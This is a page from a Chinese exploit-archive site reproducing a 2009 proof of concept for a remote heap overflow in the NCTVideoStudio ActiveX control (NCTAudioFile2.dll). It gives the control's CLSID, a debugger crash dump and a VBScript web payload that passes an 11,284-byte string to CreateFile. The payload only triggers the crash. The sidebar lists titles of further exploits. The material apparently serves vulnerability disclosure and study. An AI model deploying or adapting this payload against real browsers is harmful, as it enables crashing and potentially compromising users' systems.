首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
NCTVideoStudio ActiveX DLLs Version 1.6 Remote Heap Overflow PoC
来源:vfocus.net 作者:vfocus 发布时间:2009-02-02  
<html>
----------------------------------------------------------- <br/>
Author : Mountassif Mouad (Stack)              <br/>
----------------------------------------------------------- <br/>
NCTVideoStudio ActiveX DLLs Version 1.6 Reamote Heap Overflow Poc <br/>
----------------------------------------------------------- <br/>
<!--
Report for Clsid: {77829F14-D911-40FF-A2F0-D11DB8D6D0BC}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data       
Registers: In olly                
--------------------------------------------------     
EAX 00000001
ECX 7FFDF000
EDX 00150608
EBX 41414141
ESP 0013EFAC
EBP 0013F00C
ESI 00150000
EDI 41414139
EIP 7C97DF51 ntdll.7C97DF51
Block Disassembly:
--------------------------------------------------
7C97DF40 PUSH 0
7C97DF42 PUSH ESI
7C97DF43 CALL 7C97CDC9
7C97DF48 MOV EBX,[EBP+10]
7C97DF4B LEA EDI,[EBX-8]
7C97DF4E MOV [EBP-2C],EDI
7C97DF51 MOVZX EAX,WORD PTR [EDI]   <--- CRASH
7C97DF54 SHL EAX,3
7C97DF57 MOV [EBP-30],EAX
7C97DF5A PUSH 7C97E11C
7C97DF5F PUSH EDI
7C97DF60 PUSH ESI
7C97DF61 CALL 7C97CC6D
7C97DF66 TEST AL,AL
7C97DF68 JE 7C97E0BF

ArgDump:
--------------------------------------------------
EBP+8 00150000 -> 000000C8
EBP+12 50000061
EBP+16 41414141
EBP+20 00150000 -> 000000C8
EBP+24 41414141
EBP+28 40000060

Stack Dump:
--------------------------------------------------
13EFD4 00 00 15 00 41 41 41 41 60 00 00 40 00 00 F8 00  [........`.......]
13EFE4 F8 EF 13 00 5C F0 13 00 18 EE 01 01 A8 EF 13 00  [....\...........]
13EFF4 00 00 03 00 E0 F0 13 00 18 EE 91 7C F8 E0 97 7C  [................]
13F004 FF FF FF FF 39 41 41 41 00 00 15 00 00 00 F8 00  [................]
13F014 61 00 00 50 BE 6A 01 00 D4 EF 13 00 D8 21 F8 00  [a..P.j..........]
Block Disassembly:
--------------------------------------------------
Disasm: 7C97DF51 MOVZX EAX,WORD PTR [EDI]          
-->
<object classid='clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC' id='target' />
<script language='vbscript'>

'for debugging/custom prolog
targetFile = "C:\Program Files\NCT\VideoStudio\Redist\NCTAudioFile2.dll"
prototype  = "Sub CreateFile ( ByVal fileName As String ,  ByVal FormatType As FormatTypeConstants )"
memberName = "CreateFile"
progid     = "NCTAUDIOFILE2Lib.AudioFile2"
argCount   = 2
arg1=String(11284, "A")
arg2=1
target.CreateFile arg1 ,arg2
</script>

# [2009-01-26]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Joomla com_flashmagazinedeluxe
·OpenX 2.6.3 (MAX_type) Local F
·ClickAuction (Auth Bypass) Rem
·Flax Article Manager 1.1 Remot
·SiteXS <= 0.1.1 (type) Local F
·Max.Blog <= 1.0.6 (show_post.p
·Groone's GLink Organizer (inde
·Pixie CMS 1.0 Multiple Local F
·Wazzum Dating Software (userid
·Zinf Audio Player 2.2.1 (PLS F
·PHP-CMS 1 (username) Blind SQL
·Zinf Audio Player 2.2.1 (PLS F
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved